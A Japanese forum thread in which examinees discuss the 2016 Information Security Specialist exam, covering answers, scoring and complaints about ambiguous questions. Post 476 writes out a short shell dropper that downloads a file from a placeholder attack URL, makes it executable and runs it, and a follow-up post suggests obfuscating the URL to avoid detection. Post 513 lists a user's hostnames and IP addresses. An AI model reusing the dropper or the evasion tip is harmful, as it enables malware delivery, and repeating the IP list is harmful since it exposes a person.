2016/10/19(水) 15:49:13.03 ID:8ATGOb2v
全て選べって書いてるとこは最低2つ以上選ばないといけないと勝ってに思い込んでました
425 :
名無し検定1級さん
2016/10/19(水) 15:49:42.61 ID:r9JiXdCn
おちんちんびろーん
おちんちんびろーん
おちんちんびろーん
午後1問3 イオなのかよ!!
ウカで信じてやまなかったわ、、、
ウカでも自己採点60なのに、おわた、、、
426 :
名無し検定1級さん
2016/10/19(水) 15:54:57.15 ID:g9ttRCku
>>424 これ、実務でI.D.扱ったことのある人じゃないと引っかかりやすい罠だよな。
社員の氏名が変化しやすい情報っていう発想は問題文から読み取るのは難しいよ。
427 :
名無し検定1級さん
2016/10/19(水) 15:58:01.69 ID:F+nDC8/Y
誰か午後2の配点の目安ください!
428 :
(*´∀`)情弱士
2016/10/19(水) 16:02:05.92 ID:f2/TZgVF
選択が1つ10点で、 記述は1点であってほしい。。範囲が広すぎて勉強できるかよ
429 :
名無し検定1級さん
2016/10/19(水) 16:04:26.65 ID:OKo5TNVI
自己採点55点だった
いやだあああああああ
430 :
名無し検定1級さん
2016/10/19(水) 16:05:20.75 ID:JYrQrhd5
マルウェアZは起動禁止ソフトからは外して回答したけど、外部と通信可能だったり周辺への感染拡大が確認されてるマルウェアZ自体は野放しで対策しないって問題作った奴馬鹿だろ
サーバ変えたりダウンロードプログラムをちょっと変更したらまた被害が出るとか…
431 :
名無し検定1級さん
2016/10/19(水) 16:05:47.24 ID:ahPmlNeU
午後2配点予想プリーズ
432 :
(*´∀`)情弱士
2016/10/19(水) 16:08:45.84 ID:f2/TZgVF
>>430 ワードやエクセルにしなければないらない理由がない限り、
可能な限りJPGでやり取りする。HTTPSなWebチャットで済ませる。とかでしょ。
メールに添付して送る時代はおわたヨ。
433 :
名無し検定1級さん
2016/10/19(水) 16:13:47.04 ID:GHTD53r5
>>407 両方ギリギリ足りない可能性もあるけどな!
434 :
名無し検定1級さん
2016/10/19(水) 16:14:57.73 ID:OKo5TNVI
はい適当配点予想問1だけ
![【ファイト*^o^*】情報セキュリティスペシャリスト 105 [無断転載禁止]©2ch.netYouTube動画>1本 ->画像>17枚](https://rz.anime-tube.win/pic.php?http://i.imgur.com/OOQvetR.png)
435 :
名無し検定1級さん
2016/10/19(水) 16:16:52.50 ID:ahPmlNeU
436 :
名無し検定1級さん
2016/10/19(水) 16:17:20.56 ID:pPvWp6WG
アイテック見ると午後二行けてそう。
でも前行けてそうだったけど、
57点だったし今回も駄目かもしれない…
437 :
名無し検定1級さん
2016/10/19(水) 16:33:14.72 ID:aMF8R1a9
午後2いけそうな人は問1問2どっちなの?
438 :
名無し検定1級さん
2016/10/19(水) 16:38:23.35 ID:YzuXtpJf
>>405 まじか!
俺は午後二で問二を選択した時点で不合格が決定してた。
439 :
名無し検定1級さん
2016/10/19(水) 16:38:35.93 ID:R0xs6djR
午後2、問1選んで殆ど合ってる。。。
午後1頼む、通っててくれ><
440 :
名無し検定1級さん
2016/10/19(水) 16:42:16.99 ID:r2rabSxR
とりあえず明日のタックの解答を待てよ!
441 :
名無し検定1級さん
2016/10/19(水) 16:44:04.66 ID:aMF8R1a9
5,700円返して!!
442 :
(*´∀`)情弱士
2016/10/19(水) 17:06:50.40 ID:f2/TZgVF
443 :
名無し検定1級さん
2016/10/19(水) 17:08:27.12 ID:1B13c+A/
マルウエアZは引っ掛け問題として作ったんだろうな。
受験者のウ、カの回答見て作成者がほくそ笑む姿が目に浮かぶようだ。
444 :
名無し検定1級さん
2016/10/19(水) 17:08:55.90 ID:u7/i1xrT
この試験って、大問の間で難易度さが極端についた場合、なんらかの措置はあるの?
445 :
名無し検定1級さん
2016/10/19(水) 17:09:04.94 ID:r2rabSxR
終始ひっかけ問題しかなかった
446 :
名無し検定1級さん
2016/10/19(水) 17:09:21.21 ID:sNpwzeHQ
この試験で8割とれるやつ、マジで尊敬するわ。
せっかく午後1がいい感じでいけたのに、午後2が40点くらいでやる気失せた。
447 :
名無し検定1級さん
2016/10/19(水) 17:12:28.61 ID:I7apAtvw
448 :
(*´∀`)情弱士
2016/10/19(水) 17:12:52.37 ID:f2/TZgVF
午後問題は、出題者が思って書いてないことを書け。という無茶苦茶な糞問題もある。
今回はIPAサスペンス劇場だったな。
449 :
名無し検定1級さん
2016/10/19(水) 17:13:48.33 ID:8ATGOb2v
ひっかけ問題全部ひっかかっちゃった
アスペ試験合格ですか?
450 :
(*´∀`)情弱士
2016/10/19(水) 17:16:05.34 ID:f2/TZgVF
451 :
名無し検定1級さん
2016/10/19(水) 17:19:46.12 ID:BNwzo7vZ
調整するほど正答率が低い問題に限られるだろうから
今回だと、午後1問1の記述のいくつか、マルウェアのやつ、午後2問2ラスト、てとこでは
452 :
(*´∀`)情弱士
2016/10/19(水) 17:25:23.08 ID:f2/TZgVF
午後U問2設問5は、回答の組み合わせ多数により、設問5は記入しておれば正解とみなす。
453 :
名無し検定1級さん
2016/10/19(水) 17:29:55.24 ID:82XpHFJX
午後2 問1
1(1)a,ウ b,オ c,ス k,エ l,イ
(2) pinを他人に教えたり、紙に書いてpcに貼り付ける行為
(3) d,ウ e,ク f,ア
(4)アイウカキクケ
(5)g,イ h,オ i,ア j,セ
2 (1) 申請者が何れかの事業用システムを利用する必要があるかの確認
申請者に貸与している認証カードの数が基本要件に沿っているか
(2)アウオカ
(3)不備:失効の受付と失効を失効情報サーバに登録して公開する時間にタイムラグがある点
値:アエ
3 (1) ルートcaの認証がされないためサーバに接続できない可能性がある
(2)不正なサイトをD社のものと判断してサイトにアクセスし、情報などが流出するリスク
4 (1)認可されたシステムのみ利用でき認証のログを基にして操作履歴を取得しているため
(2) Bは貸与対象ごとに一枚の認証カードの貸与をするため管理枚数が少なくなる
連続したプロジェクトへの参加の場合、失効管理の工数が少なくなる
(3)認証カードを貸与された者はそれまで利用していた入退室カードが利用できなくなるため
60行けそうですかね?
454 :
名無し検定1級さん
2016/10/19(水) 17:36:57.31 ID:r2rabSxR
455 :
名無し検定1級さん
2016/10/19(水) 18:16:15.63 ID:8rMhnuWw
認証と認可を敢えて分けて書かせた割には普通の解答だったな
認可ってセキュリティ上の何か特殊な意味があると思ってた
456 :
名無し検定1級さん
2016/10/19(水) 18:18:04.80 ID:I7apAtvw
>>451 大問ではなくて、個々の問題ごとに調整、という意味なのかな?
457 :
名無し検定1級さん
2016/10/19(水) 18:23:00.71 ID:BNwzo7vZ
>>456 いや適当に言いましたすんません
難しいとされたのは午後1は問1、午後2は問2、かな
458 :
名無し検定1級さん
2016/10/19(水) 18:29:14.66 ID:9Ladv7Yd
午後2両方解いたけど
調整するほどは難易度違わなかったと感じる
459 :
名無し検定1級さん
2016/10/19(水) 18:38:07.21 ID:h72VSa4k
>>0453
これ余裕で合格だろ。
460 :
(*´∀`)情弱士
2016/10/19(水) 18:43:32.85 ID:f2/TZgVF
461 :
名無し検定1級さん
2016/10/19(水) 18:51:56.98 ID:h72VSa4k
>>99 ありがとうございます
暗い毎日を送るとこでしたが、ちょっとでも希望を持って結果発表日を迎えれそうです。
462 :
名無し検定1級さん
2016/10/19(水) 18:58:39.82 ID:jkDipa0u
>>141だけど、部分点込みなら60点いってるかも?と期待するのはおかしい?
正直ギリギリセーフかもと思ってるんだけど
463 :
名無し検定1級さん
2016/10/19(水) 19:00:43.74 ID:SKYOvjrw
午後1 問3(2)って
「未知のプログラム名やハッシュ値をもつ場合」じゃだめかな?
464 :
名無し検定1級さん
2016/10/19(水) 19:01:45.06 ID:SKYOvjrw
あっ、すまん書き忘れた
設問2な
465 :
名無し検定1級さん
2016/10/19(水) 19:07:08.74 ID:Vhfn4ZA5
>>462 なんともいえん
50はさすがに越えてると思うけど
6割いってるかは微妙
466 :
名無し検定1級さん
2016/10/19(水) 19:12:42.01 ID:r2rabSxR
>>463 その問題だけを見た場合はそれでも間違いではないんだけど、
大問としての流れだと「攻撃用プログラム」はすでにDLされていて既知だから…
467 :
名無し検定1級さん
2016/10/19(水) 19:17:24.71 ID:NlbA3HtY
ほれ、午後U問2配点予想
設問1
(1)3点(2)8点
設問2
(1)3点(2)3点(3)6点(4)8点
設問3
(1)6点(2)8点(3)6点(4)8点
設問4
(1)6点(2)9点(3)8点
設問5
(1)4点(2)6点(3)8点
468 :
名無し検定1級さん
2016/10/19(水) 19:20:31.58 ID:8rMhnuWw
午後2の問1は割とあっさりしてたな
推奨暗号リスト全部選べは流石に覚えてねえって感じだけど
あとは素で書けば点数もらえそうな答え
469 :
名無し検定1級さん
2016/10/19(水) 19:24:33.17 ID:+sHc695O
教えてやるけど、基準点の変更の難易差は年度ごとの難易差な。
まあどっちにしろ調整されないんだが
470 :
名無し検定1級さん
2016/10/19(水) 19:38:05.90 ID:XxHt8oh9
>>466 Pさん(だっけ?)のPCにダウンロードされた「攻撃用プログラム」は名前、ハッシュを起動禁止済みだとして、あとは
>>160の考え方では。
日本語の問題だけど「攻撃用プログラム」を、一般名詞として見るか、固有名詞としてみるかで、攻撃用プログラムがPさんに使われたものと同一種であるべきかが変わってくるよな。
471 :
名無し検定1級さん
2016/10/19(水) 19:38:56.38 ID:Vhfn4ZA5
ホントに国語の問題だなw
472 :
名無し検定1級さん
2016/10/19(水) 19:42:43.71 ID:+Q8EsNte
午後2は日本語の解釈によって答えがブレるところが少なかった気がする
午後1はひど過ぎる
473 :
(*´∀`)情弱士
2016/10/19(水) 19:43:19.52 ID:f2/TZgVF
474 :
名無し検定1級さん
2016/10/19(水) 19:45:40.67 ID:0rh15364
>>470 問題文中では、通信と怪しいメールの存在だけが仄めかされてて、マルウェアが既知とは一言も書いてないんだよなあ。
なんか納得できない問題。
475 :
名無し検定1級さん
2016/10/19(水) 19:47:44.11 ID:0rh15364
>>471 現代文の試験に失礼だろ(笑)
現代文の試験は一意的に解釈できるように作ってるよ。
特に有名国立大は。
476 :
(*´∀`)情弱士
2016/10/19(水) 19:49:02.38 ID:f2/TZgVF
>>473 シェルだと4行で書ける、検出不可能なドロッパーw
file_name=現在時刻
curl 攻撃アプリのURL > $file_name
chmod +x $file_name
$file_name
477 :
(*´∀`)情弱士
2016/10/19(水) 19:51:29.17 ID:f2/TZgVF
>>476 攻撃アプリのURLは、文字列置き換え処理を入れないと一発で検出されてしまうなぁ・・
478 :
名無し検定1級さん
2016/10/19(水) 19:54:18.91 ID:XxHt8oh9
>>473-474 情弱おじさんはほんと設問読めないんだな。
午後1問3-2-(2) は名前・ハッシュを登録しても攻撃用プログラムを起動禁止できない場合を問う問題。
マルウェアZは関係ない。
479 :
名無し検定1級さん
2016/10/19(水) 20:00:01.94 ID:kazX5M5T
480 :
名無し検定1級さん
2016/10/19(水) 20:01:09.63 ID:YSe8NQVj
>>474 攻撃用プログラムが既にダウンロードされてるのに既知でないとはこれいかに
481 :
名無し検定1級さん
2016/10/19(水) 20:07:07.80 ID:0rh15364
>>480 攻撃用プログラムが特定のプログラムを指してるのか、攻撃用プログラムっていう種類を指しているのかによって、問題の意味が変わるだろ。
そこが悪質なんだよ。
482 :
(*´∀`)情弱士
2016/10/19(水) 20:13:42.40 ID:f2/TZgVF
>>478 情報処理脆弱性対策支援士。を縮めて、情弱士。
そうだな、ペイロードの本体が検出できない=新しい攻撃プログラムだということ。
483 :
名無し検定1級さん
2016/10/19(水) 20:22:09.39 ID:jTtiM03q
何回か受けてる人に聞きたいんだけど、毎回こんなにもめてんの?
484 :
名無し検定1級さん
2016/10/19(水) 20:23:31.51 ID:s/5qH2hy
それは気になる
485 :
名無し検定1級さん
2016/10/19(水) 20:25:06.48 ID:wg61mMet
国語能力試験をコミュ障が受験してるから仕方ない
486 :
名無し検定1級さん
2016/10/19(水) 20:30:38.39 ID:BNwzo7vZ
SCは初めてで高度複数持ちの俺の私見となるが
・ 合格するやつはスレに常駐しないで去っていく
・ 合格できずにスレに場馴れすると自然と発言が増える
・ スレの常連とは、基本的には常に失敗してる落ちこぼれ
なので、試験後や合格発表の数日後は、自然と腐った見解が溜まりやすい
反面教師にして自戒すると宜し
487 :
名無し検定1級さん
2016/10/19(水) 20:38:02.80 ID:0rh15364
>>485 国語能力試験だとしても酷いよ。
高校時代に解いた東大の現代文も、もう少し答えが明快。
488 :
名無し検定1級さん
2016/10/19(水) 20:39:09.56 ID:r2rabSxR
489 :
名無し検定1級さん
2016/10/19(水) 20:39:30.93 ID:fhaj7BmA
午後1の問3は割と出来たのに問1でとんちんかんなこと書いたやつ
そして午後2問1は割と出来たやつ
俺だけじゃないはず
490 :
名無し検定1級さん
2016/10/19(水) 20:40:51.60 ID:r2rabSxR
国語の問題は1つの解答が複数あるのであって、IPA言語は1つの問題文に対して問題の意味が複数あるのです
491 :
名無し検定1級さん
2016/10/19(水) 20:47:15.75 ID:G3ZsH+ge
サーバのURLって何?
492 :
(*´∀`)情弱士
2016/10/19(水) 20:47:35.59 ID:f2/TZgVF
午前T問3設問2(2)はオフィスモンキーだ。面白いから起動してしまうという落ちでOK?
社長命令を装った攻撃メールは、防ぎきれるかな?
493 :
名無し検定1級さん
2016/10/19(水) 20:49:20.45 ID:G3ZsH+ge
URLはサーバ上のコンテンツの名称だよね?
494 :
名無し検定1級さん
2016/10/19(水) 20:54:10.30 ID:r2rabSxR
サーバ上のコンテンツ、データの位置をどこにあるか指定するものだろ
495 :
(*´∀`)情弱士
2016/10/19(水) 20:54:45.05 ID:f2/TZgVF
>>492 攻撃用プログラムって言われるけど、普通のメールなんだよ。
社長に成りすました新薬情報をFAX送信する指示メール (26字)。
496 :
名無し検定1級さん
2016/10/19(水) 20:55:14.67 ID:YFzbqhZR
P部長:肝心なときに役に立たんな
497 :
名無し検定1級さん
2016/10/19(水) 20:57:57.06 ID:r3zjFmBi
P部長:こんなときに立つな
498 :
名無し検定1級さん
2016/10/19(水) 21:10:55.04 ID:/Tls1sa1
国語が専門だけど作問者の国語能力が低いと思う
何について聞いてるのかがはっきりしないし複数考えられる
499 :
(*´∀`)情弱士
2016/10/19(水) 21:15:53.97 ID:f2/TZgVF
>>492 プログラム起動禁止設定はLANのなかのPC管理サーバで行う。
LANを一時的に無効にしたら攻撃プログラムは実行するか?
500 :
名無し検定1級さん
2016/10/19(水) 21:19:11.11 ID:mCVMf2Ua
過去問は二年分くらいしか解いてないけど、今年の問題が一番もやもやする
501 :
名無し検定1級さん
2016/10/19(水) 21:19:25.89 ID:ikCsJmQF
502 :
名無し検定1級さん
2016/10/19(水) 21:19:53.38 ID:0rh15364
>>498 意識的にやってるのかわからんけど、質問の意図が曖昧だよな。
正直、悪文って意味ではIPA資格がダントツだと思う。
503 :
名無し検定1級さん
2016/10/19(水) 21:20:53.91 ID:s/5qH2hy
>>486 14も書き込みしててそれは説得力無いな…
こんな試験複数回落ちるとかさすがにおらんやろ
504 :
名無し検定1級さん
2016/10/19(水) 21:34:29.37 ID:0rh15364
さっき、自己採点と結果のズレを知りたくて、
受験者のブログを検索してたけど、
何回も落ちる人もいるみたいよ。
ブログ書いてるから落ちるのかもしれないけど。
505 :
名無し検定1級さん
2016/10/19(水) 21:35:39.77 ID:mt8JNQf6
自己採点だけど午前〜午後1が8割で、午後2が微妙なののぞいても7割なので通ったと思う
506 :
名無し検定1級さん
2016/10/19(水) 21:37:31.14 ID:mt8JNQf6
あ、書き込んじゃった
書きたかったのはこのスレのみんなありがとうってのと
座布団持って行って快適でした
507 :
名無し検定1級さん
2016/10/19(水) 21:40:23.24 ID:wHHAFOcT
>>498 国語が専門ってなんだ
受験用現代文も特殊語であんなもん国語じゃないぞ
508 :
名無し検定1級さん
2016/10/19(水) 21:44:44.09 ID:0rh15364
>>507 横槍だけど、文章の書き方自体は真面目な研究対象だし、読解法もきちんと学問化されてるよ。
国語の問題とかIPA言語の厄介な点は作者の死をきちんと処理できてるか否かの部分で、
国語の試験はきちんとし過ぎ、
IPA試験は作者の死を否定してるから厄介っていうのは
あると思う。
509 :
名無し検定1級さん
2016/10/19(水) 21:47:57.88 ID:mCVMf2Ua
あーわかるわかる。作者の死だよね。IPAはクソ
510 :
(*´∀`)情弱士
2016/10/19(水) 21:56:48.48 ID:f2/TZgVF
攻撃用プログラムはメモ帳でもメーラーでも何でもよい。
書いてある内容が会社にダメージを与えるような架空指示なら正解です。
511 :
名無し検定1級さん
2016/10/19(水) 22:13:25.34 ID:hxKe1WNd
公式解答公開まであと50日
512 :
名無し検定1級さん
2016/10/19(水) 22:17:53.59 ID:JSFswoMv
>>489 セキュアプログラミングなんて完全に眼中になかったんだが、本番で見たら意外といけそう、と思いつつもひよって問1を選んだら爆死したわ
普段プログラミングやってなくてもできちゃいそう回もあるんだなあ
513 :
名無し検定1級さん
2016/10/19(水) 22:53:01.12 ID:uWCibBao
68 :NWスレ住人:2012/05/26(土) 10:52:51.00 HOST:ntwkym009179.wkym.nt.adsl.ppp.infoweb.ne.jp<80><8080><3128><8000><1080>[219.104.52.179]
71 :NWスレ住人:2012/06/16(土) 20:38:58.00 HOST:ntwkym025042.wkym.nt.adsl.ppp.infoweb.ne.jp<80><8080><3128><8000><1080>[125.1.99.42]
74 :NWスレ住人:2012/06/25(月) 20:57:48.00 HOST:ntwkym008232.wkym.nt.adsl.ppp.infoweb.ne.jp<80><8080><3128><8000><1080>[202.219.151.232]
85 :NWスレ住人:2012/07/11(水) 19:46:10.00 HOST:ntwkym014036.wkym.nt.adsl.ppp.infoweb.ne.jp<80><8080><3128><8000><1080>[210.131.84.36]
87 :NWスレ住人:2012/07/16(月) 08:19:03.00 HOST:ntwkym008041.wkym.nt.adsl.ppp.infoweb.ne.jp<80><8080><3128><8000><1080>[202.219.151.41]
91 :NWスレ住人:2012/07/25(水) 18:34:48.00 HOST:ntwkym008167.wkym.nt.adsl.ppp.infoweb.ne.jp<80><8080><3128><8000><1080>[202.219.151.167]
94 :NWスレ住人:2012/08/01(水) 22:21:37.00 HOST:ntwkym027075.wkym.nt.adsl.ppp.infoweb.ne.jp<80><8080><3128><8000><1080>[125.1.101.75]
96 :NWスレ住人:2012/08/09(木) 18:08:22.00 HOST:ntwkym027108.wkym.nt.adsl.ppp.infoweb.ne.jp<8080><3128><8000><1080>[125.1.101.108]
99 :NWスレ住人:2012/08/18(土) 21:26:10.00 HOST:ntwkym025101.wkym.nt.adsl.ppp.infoweb.ne.jp<8080><3128><8000><1080>[125.1.99.101]
109 :NWスレ住人:2012/09/05(水) 20:01:43.00 HOST:ntwkym008062.wkym.nt.adsl.ppp.infoweb.ne.jp<8080><3128><8000><1080>[202.219.151.62]
120 :NWスレ住人:2012/10/03(水) 21:32:02.00 HOST:ntwkym029071.wkym.nt.adsl.ppp.infoweb.ne.jp<8080><3128><8000><1080>[125.1.103.71]
437 :まとめなおし:2015/12/26(土) 14:03:42.46 HOST:ntwkym008020.wkym.nt.adsl.ppp.infoweb.ne.jp
514 :
名無し検定1級さん
2016/10/19(水) 22:58:57.84 ID:1fhRa/OH
模範解答宛てにするなら、免除-100点-90点台-90点台だな
特に設問の意図が分かりにくいところはなかった気がする
結局自分の理解が及ばないのを問題が悪いと責任転嫁してるだけじゃないの?
515 :
名無し検定1級さん
2016/10/19(水) 23:01:09.18 ID:mCVMf2Ua
516 :
名無し検定1級さん
2016/10/19(水) 23:03:27.94 ID:r2rabSxR
煽りが香ばしいな
517 :
名無し検定1級さん
2016/10/19(水) 23:05:17.30 ID:5VjR/rSG
>>514 言いたいことはわかるが、そもそも読解力ってエンジニアの仕事に必要なのかな?
思い込みによる対応って一番やってはいけないことと思うが。
518 :
名無し検定1級さん
2016/10/19(水) 23:05:26.49 ID:mCVMf2Ua
擁護するほどの良問だとは決して思えない。IPA職員が出張ってきてんだろ
よくあんなクソ問出しやがったな。前スレからの無数の不満を真摯に受け止めろよ
519 :
名無し検定1級さん
2016/10/19(水) 23:06:53.56 ID:7dBDEdZe
別解も公表するんなら別にいいんだけどな。
520 :
名無し検定1級さん
2016/10/19(水) 23:07:09.95 ID:8ATGOb2v
521 :
名無し検定1級さん
2016/10/19(水) 23:09:19.73 ID:AVsaHRBv
まだ問題文が漢文でないだけありがたいと思え
522 :
名無し検定1級さん
2016/10/19(水) 23:10:58.29 ID:Gai3Yx9s
その模範解答が80点ぐらいなんだよなあ
523 :
名無し検定1級さん
2016/10/19(水) 23:18:28.54 ID:NKnNLHpB
>>481 マルウェアZが攻撃用プログラムをダウンロードしたって書いてあるから特定のプログラムを指していると思う
524 :
名無し検定1級さん
2016/10/19(水) 23:20:12.47 ID:NKnNLHpB
バイト君じゃなくて知識ある人が採点してほしい
525 :
名無し検定1級さん
2016/10/19(水) 23:20:25.29 ID:XxHt8oh9
>>517 ここで騒いでる奴のように、文章で明示されてる条件を見落として見当違いなこと主張を続けるのはそれこそ「思い込みによる対応」の最たるものですわ
526 :
名無し検定1級さん
2016/10/19(水) 23:24:57.90 ID:mCVMf2Ua
文章で明示されてるものを探すという問題で合格率15%切るとか、どんだけ巧妙に隠してんだよってことだな。技術文書としては論外だし書き手の瑕疵と言われても仕方がない
527 :
名無し検定1級さん
2016/10/19(水) 23:27:14.24 ID:mCVMf2Ua
まあ俺は明示されてるとも答えが一意に決まるとも思ってないけどね
回答が一意だと主張してる左門至峰とかいるけど、それは単なる願望であって
実際はガバガバのガバガバ。必死に擁護する価値もないよ
528 :
名無し検定1級さん
2016/10/19(水) 23:29:25.90 ID:8Lb5mJPM
要件がブレてるとかもやってるとか日常茶飯事で、
そこを決めてあげて各所と握るとお給料もらえるけど、
試験では相談相手いないから不満が空を切るのはわかる。
529 :
名無し検定1級さん
2016/10/19(水) 23:29:44.03 ID:AVsaHRBv
俺は左門擁護派だ
530 :
名無し検定1級さん
2016/10/19(水) 23:35:55.48 ID:pdej2rd7
試験会場で隣だったショーパン黒タイツお姉さんとLINE交換した奴だけど、日曜日にデートすることになったわ
ネスペとセスペで迷ったけどセスペの試験受けてよかった〜
531 :
名無し検定1級さん
2016/10/19(水) 23:38:20.62 ID:mCVMf2Ua
ハゲたおっさんと工学部にいそうな女子しかいなかったよ
同世代すら少なかった
高専生とか受けてるはずなのになあ
532 :
名無し検定1級さん
2016/10/19(水) 23:40:07.73 ID:pdej2rd7
533 :
名無し検定1級さん
2016/10/19(水) 23:41:49.32 ID:mCVMf2Ua
俺は高専生ではないけどな。若者が想像以上に少なかった。応用は中高生のようなのがいっぱいいたのに
534 :
名無し検定1級さん
2016/10/19(水) 23:43:20.54 ID:GBjHbZDL
535 :
名無し検定1級さん
2016/10/19(水) 23:44:03.02 ID:pdej2rd7
高専生じゃないのか
応用に高校生(制服)が多いのは、商業系の高校とかで教師が受けろ受けろ言ってるからだよ
金もらってんのかってぐらい勧めてくるらしい
536 :
名無し検定1級さん
2016/10/19(水) 23:45:06.44 ID:5VjR/rSG
>>525 なんとなく、文章に隠されたヒントから回答をひねり出すってスタイルそのものが、
実際の仕事から大きく乖離してるように思うんだよね。
実際の仕事にはヒントが隠されてるんじゃなく、自分で調査を行ってヒントを
見つけ出していくわけだし。
今の時代に手書きなのも含め、試験のスタイルを根本から考え直さないと、
アジアで最も成績の悪い英語教育の二の舞になってるような感じがする。
537 :
名無し検定1級さん
2016/10/19(水) 23:48:23.66 ID:pdej2rd7
>>534 次試験受けるときはちゃんとベイク持ってくんだぞ!
お裾分けが一番知らない人に話しかけやすいからな
538 :
名無し検定1級さん
2016/10/19(水) 23:49:36.95 ID:mCVMf2Ua
試験会場でナンパとか只の変人
539 :
名無し検定1級さん
2016/10/19(水) 23:50:11.63 ID:mCVMf2Ua
まあ性欲盛りの猿だから仕方ないけど
540 :
名無し検定1級さん
2016/10/19(水) 23:56:22.26 ID:N3PECrpv
まあ、実際のとこ。まだ今週はマークシートの採点までかな。
午前2までの絞り込みで10000人ぐらいまで絞るのに、もっとかかるかな?
541 :
名無し検定1級さん
2016/10/20(木) 00:13:17.30 ID:ufivNHIM
ずっと問題分の解釈で議論してる人って
ミーティングでいちいちツッコミ入れて時間延長させてそうだよなw
542 :
514
2016/10/20(木) 00:18:24.99 ID:wF0CCEht
543 :
名無し検定1級さん
2016/10/20(木) 00:26:57.55 ID:77aITSfX
模範解答宛てにするなら、90点台→満点はないだろう、模範解答もレベル低めだし
はあ…
午後2は問2のHTTPリクエストヘッダを間違えた
はあ〜、マジはあ〜〜〜〜〜
筆記で間違ってないと言わないためにこの問題を間違ったと言うのはいくらなんでも無理があるだろ…
544 :
名無し検定1級さん
2016/10/20(木) 00:31:25.30 ID:2Zb0V9D+
スキル4はこれぐらいの難易度でちょうどいいと思うけどな。
それ以上は試験不可の未踏クラス扱いで。
スキル5作っても受験者数1000人合格率一桁とかじゃ、何それってなる。
545 :
名無し検定1級さん
2016/10/20(木) 00:40:44.86 ID:2GtuiGge
問題文にいまだにケチつけてるのは自己採点50点くらいの人だよね
点数とれなくて心まで荒んでると思うとすごくかわいそうだし、何かしてあげたい
546 :
名無し検定1級さん
2016/10/20(木) 00:42:46.98 ID:77aITSfX
547 :
名無し検定1級さん
2016/10/20(木) 00:45:01.56 ID:DTaSQ8bV
TACの解答がまた出るだろうけどITECと割れてる部分あるだろうな
548 :
514
2016/10/20(木) 01:04:30.95 ID:wF0CCEht
別に煽ったつもりもないし、点数騙ってもいないよ。ネスペだって平均90だったし
(ネスペの過去問には何度もキレてたから気持ちわからなくもないんだけど)
まぁ少なくとも周りのせいにするのは自分に非がないことを確実にしてからの方がいいね、バグの指摘みたいに
549 :
名無し検定1級さん
2016/10/20(木) 01:07:04.34 ID:77aITSfX
>>548 なあ、少し論理的な言葉を喋ってほしいのだが、どうやって自分に非がないことを確実にするんだ?
550 :
名無し検定1級さん
2016/10/20(木) 01:10:10.25 ID:nKuCFG/X
>>483 そうだよ
「問題文の意味が分からないんだけど?」「国語の問題すぎるだろ」「IPAは氏ね」「iTECとTACで解答割れたww」
みたいなのが毎回書かれてる
551 :
名無し検定1級さん
2016/10/20(木) 01:11:22.89 ID:77aITSfX
専門家の解答が割れる程度の問題しか作れないからだろ。自明性がない
552 :
名無し検定1級さん
2016/10/20(木) 01:12:57.72 ID:J6TNIiLs
553 :
名無し検定1級さん
2016/10/20(木) 01:14:22.35 ID:LeT4y6pI
>>542 90点取れる人に聞きたいんですがどんな対策しましたか?
セキュリティの記事読みあさったとか過去問解きまくったとか
なんでもいいので教えてもらえるとありがたいです
554 :
名無し検定1級さん
2016/10/20(木) 01:28:18.64 ID:wF0CCEht
実機検証してみたとか、RFCに書いてあるとか、
国語の問題なら周りの賢い人10人に訊いてみた、とかいろいろあるじゃん
まともな反証なしに問題が悪いって決めつけが多い気がして
わかる人はちゃんとわかってるんだし
でもごめん、自分のやってない問に酷い設問があったのかもしれないね
出題者もプロだけどこっちだってプロだからね、他の高度試験でもなんだかなぁ違うよなぁって問題は確かにある
555 :
名無し検定1級さん
2016/10/20(木) 01:45:01.54 ID:nKuCFG/X
論理的におかしくない解答が正解とならないのが問題
正解が複数考えられる場合でもそれらがすべて正解と認められるなら問題にならない
この試験はIPAの気に入る解答じゃないと正解にならない
556 :
名無し検定1級さん
2016/10/20(木) 01:57:34.80 ID:wF0CCEht
>>555 確かににそれはあるけど、一応この取ってつけたような記述で絞り込んでよ、ってのはあるからね
試験問題としてきれいではないけど
>>553 改めてのセスペ対策は大したことしてない
過去問6回分と教科書2冊読んで、暗記用キーワードや自分の理解をメモにまとめただけ
仕事ではファームの署名や暗号化もするし、小規模サーバクラスタ管理もするし、
脆弱性対応が公表されれば対応するし、簡単なWebアプリや低レイヤネットワーク処理も書くし
wiresharkでSSLライブラリのバグ調査とかもするし、こっちの経験の方がたぶん大きい
参考になるかわかんないけど技術面だけなら、とりあえずLinux環境でも用意して色々触るのが
面白いし実際のイメージ湧きやすいんじゃないの
opensslコマンドでAESや鍵ペア作って署名したり暗号化したり、md5sumやshaXXXsumコマンドとか
Webアプリだって適当なフレームワークで簡単なの作ってみて、パケット覗くだけでも実際の動きがよくわかる
そんな状態で試験問題見れば、これそのまんまだーってなるよ、、、たぶん
酔い回ったのでもう寝る
557 :
名無し検定1級さん
2016/10/20(木) 02:09:00.78 ID:OHBxxwVJ
>>537 自分と相手はそれぞれ何歳か教えてほしいぜよ。
by東京高専生
558 :
名無し検定1級さん
2016/10/20(木) 02:52:00.58 ID:iwWjfny2
セスペの試験でセフレを作る…?
アイテックの解答例とこのスレで出てた配点をもとに採点すると、
午後1:49〜72
午後2:60前半〜70前後くらい
午後1は記述のところがどう採点されるのか正直よくわからない。
微妙だと思ったのを0点にすると49で全然届かない。
明らかに違うところ以外はほぼ合ってるとすると70くらい。
うーん、やっぱ午後1がなあ。
難しいと言われている問1を選んでるから下駄を期待。
まあもはやできるのは祈ることぐらいだけど。
559 :
名無し検定1級さん
2016/10/20(木) 03:47:43.61 ID:Cd/NUrgl
午後1問3選んでない人はいらっしゃるのだろうか
ウカ以外は本当に簡単だったけど
560 :
名無し検定1級さん
2016/10/20(木) 06:42:10.15 ID:tpcb67i3
試験が終わってから何十回もグチグチ自分の無能さ示すような書き込みしまくるほどの時間があるなら
なぜ試験前にもっとちゃんと過去問をやりまくって対策をしなかったのか
561 :
名無し検定1級さん
2016/10/20(木) 06:51:37.06 ID:s6bwF37f
左門至峰も、別解はないと思えってだけで、
常に正当は一意と言ってるわけではないだろ
562 :
名無し検定1級さん
2016/10/20(木) 06:54:52.13 ID:APOELM9G
基本的にIPAの出題と解答にはブレが無いと思うぞ
IPAの問題になれるほうがいい
563 :
名無し検定1級さん
2016/10/20(木) 06:59:23.97 ID:Ek2AJEgv
>>560 試験の合否に関係無く、問題が粗末であることを指摘しているのだ
高い品質を持つ問題ならば不合格でも文句は言わない
564 :
名無し検定1級さん
2016/10/20(木) 07:08:27.91 ID:c4V5b/Kx
>>557 俺 19歳
お姉さん 25歳
ひよっこインフラ系エンジニアらしい
565 :
名無し検定1級さん
